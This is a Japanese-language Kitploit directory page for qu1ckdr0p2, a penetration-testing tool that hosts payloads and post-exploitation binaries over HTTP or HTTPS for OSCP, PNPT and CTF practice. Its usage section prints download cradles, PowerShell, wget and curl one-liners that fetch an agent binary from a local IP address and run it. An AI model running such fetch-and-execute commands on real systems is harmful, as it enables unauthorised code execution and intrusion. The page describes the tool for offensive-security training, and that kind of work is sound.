Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
qu1ckdr0p2 — Quicky を使用して、http または https 経由でファイルを迅速に提供します。 | Kitploit
ツール/GitHubGitHub/byinarie/qu1ckdr0p2
ペイロード生成ポストエクスプロイトウェブセキュリティペネトレーションテストレッドチーミングペイロード開発
GitHubbyinarie/qu1ckdr0p2

qu1ckdr0p2

Quicky を使用して、http または https 経由でファイルを迅速に提供します。

リポジトリを見る
3552年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Python Flask Visual Studio Code Prettier License: MIT

概要

ペイロードやポストエクスプロイト用バイナリをHTTPまたはHTTPSで素早くホスティングします。

OSCP / PNPT や CTF (HTB 等) の試験用に設計されています。

プルリクエストやイシュー、その他のコントリビューションは歓迎します。

Qu1ckdr0p2 にはエイリアス機能と検索機能が付属しています。ツールは qu1ckdr0p2-tools リポジトリにあります。デフォルトでは、--https オプションを使用する際に自己署名証明書が生成されます。Webサーバー起動時には tun0 インターフェースが優先され、それ以外の場合は eth0 が使用されます。

common.ini は、--search および -u オプション内で使用されるマッピングされたエイリアスを定義します。

Webサーバーが起動すると、コピーして貼り付けられるダウンロード用の簡易コマンド(ダウンロードクレードル)が画面に表示されます。

注意

ダウンロードクレードルをコピー&ペーストする際、ターミナルエミュレータによっては、素早くトリプルクリックまたはダブルクリックして選択する必要がある場合があります。これは今後のバージョンで修正予定です。

インストール

pip を使用することが唯一サポートされているインストール方法です

このリポジトリをクローンしてインストールすると、おそらく何かが壊れます

root@kitploit:~
pip3 install qu1ckdr0p2

echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc
source ~/.zshrc

or

echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc
source ~/.bashrc

serv init --update

使用方法

カレントディレクトリにある単一ファイルを配信

root@kitploit:~
$ serv serve -f implant.bin --https 443
root@kitploit:~
$ serv serve -f file.example --http 8080

アップデートとヘルプ

root@kitploit:~
$ serv --help            
Usage: serv [OPTIONS] COMMAND [ARGS]...

  Welcome to qu1ckdr0p2 entry point.

Options:
  --debug  Enable debug mode.
  --help   Show this message and exit.

Commands:
  init   Perform updates.
  serve  Serve files.
root@kitploit:~
$ serv serve --help
Usage: serv serve [OPTIONS]

  Serve files.

Options:
  -l, --list         List aliases
  -s, --search TEXT  Search query for aliases
  -u, --use INTEGER  Use an alias by a dynamic number
  -f, --file FILE    Serve a file
  --http INTEGER     Use HTTP with a custom port
  --https INTEGER    Use HTTPS with a custom port
  -h, --help         Show this message and exit.
root@kitploit:~
$ serv init --help       
Usage: serv init [OPTIONS]

  Perform updates.

Options:
  --update            Check and download missing tools.
  --update-self       Update the tool using pip.
  --update-self-test  Used for dev testing, installs unstable build.
  --help              Show this message and exit.
root@kitploit:~
$ serv init --update
root@kitploit:~
$ serv init --update-self

マッピングされたエイリアスからファイルを配信

-u オプションのマッピングされたエイリアス番号は動的であるため、特定の番号を覚えたり、ツール名を入力する必要はありません。

root@kitploit:~
$ serv serve --search ligolo               

[→] Path: ~/.qu1ckdr0p2/windows/agent.exe
[→] Alias: ligolo_agent_win
[→] Use: 1

[→] Path: ~/.qu1ckdr0p2/windows/proxy.exe
[→] Alias: ligolo_proxy_win
[→] Use: 2

[→] Path: ~/.qu1ckdr0p2/linux/agent
[→] Alias: ligolo_agent_linux
[→] Use: 3

[→] Path: ~/.qu1ckdr0p2/linux/proxy
[→] Alias: ligolo_proxy_linux
[→] Use: 4
(...)
root@kitploit:~
$ serv serve --search ligolo -u 3 --http 80

[→] Serving: ../../.qu1ckdr0p2/linux/agent
[→] Protocol: http
[→] IP address: 192.168.1.5
[→] Port: 80
[→] Interface: eth0
[→] CTRL+C to quit

[→] URL: http://192.168.1.5:80/agent

[↓] csharp:
$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'

[↓] wget:
wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent

[↓] curl:
curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent

[↓] powershell:
Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent

⠧ Web server running

ライセンス

MIT

ツールをダウンロード